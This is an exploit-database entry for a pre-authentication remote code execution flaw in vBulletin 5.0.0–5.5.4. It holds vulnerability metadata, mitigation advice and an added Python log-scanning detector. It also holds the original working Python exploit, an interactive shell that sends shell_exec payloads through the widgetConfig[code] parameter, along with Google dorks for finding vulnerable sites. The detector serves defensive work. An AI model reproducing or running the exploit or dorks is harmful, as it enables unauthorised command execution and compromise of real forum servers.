Vendor: vBulletin 5.x
By: Anonymous
CVSS: 9.8 (HIGH)
Remote Code Execution
CWE: 78
Product Name: vBulletin 5.x
Affected Version From: 5.0.0
Affected Version To: 5.5.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

vBulletin 5.x 0day pre-auth RCE exploit

This exploit allows an unauthenticated attacker to execute arbitrary code on a vulnerable vBulletin 5.x installation. It works on all versions from 5.0.0 through 5.5.4. The exploit is triggered by sending a specially crafted POST request to the vulnerable server that selects the 'ajax/render/widget_php' route through the 'routestring' parameter and carries a payload in the 'widgetConfig[code]' parameter. The server then executes that payload.

Mitigation:

Upgrade to the latest version of vBulletin 5.x
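
The request shape described above can be looked for in reverse-proxy or WAF records that capture the form body. This is an added detection example, not part of the original entry; the record layout and sample requests are constructed, and lower-casing names and values before comparing is a conservative assumption.

```python
from urllib.parse import parse_qs, urlsplit

ROUTE = "ajax/render/widget_php"    # routestring value used on this page
CODE_PARAM = "widgetconfig[code]"   # parameter named on this page, lower-cased

def request_params(target, body):
    """Merge query-string and form-body parameters; parse_qs percent-decodes both."""
    merged = {}
    for encoded in (urlsplit(target).query, body):
        for name, values in parse_qs(encoded, keep_blank_values=True).items():
            # Assumption: compare case-insensitively so odd casing is still flagged.
            merged.setdefault(name.strip().lower(), []).extend(values)
    return merged

def classify(target, body=""):
    """Return 'code-param', 'route-only' or None for one HTTP request."""
    params = request_params(target, body)
    routes = [v.strip().strip("/").lower() for v in params.get("routestring", [])]
    if ROUTE not in routes:
        return None
    # Route plus the code parameter is the request shape the entry describes.
    return "code-param" if CODE_PARAM in params else "route-only"

# Constructed sample records (method, request target, form body); not real traffic.
SAMPLE = [
    ("GET", "/forum/index.php?routestring=forum/general", ""),
    ("POST", "/forum/index.php",
     "routestring=ajax/render/widget_php&widgetConfig%5Bcode%5D=PLACEHOLDER"),
    ("POST", "/forum/index.php?routestring=Ajax/Render/Widget_PHP", "a=1"),
    ("POST", "/forum/index.php", "routestring=forum/other&a=1"),
]

def scan(records):
    """Return (index, verdict) for every record that touches the widget_php route."""
    hits = []
    for i, (_method, target, body) in enumerate(records):
        verdict = classify(target, body)
        if verdict:
            hits.append((i, verdict))
    return hits

if __name__ == "__main__":
    for index, verdict in scan(SAMPLE):
        print(index, verdict, SAMPLE[index][1])
```

A 'code-param' verdict from an unauthenticated client warrants checking the installed version against the affected range above; 'route-only' hits are lower confidence and worth correlating by source address.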

Exploit-DB raw data:

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
# 
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input("vBulletin$ ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               print r.text
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))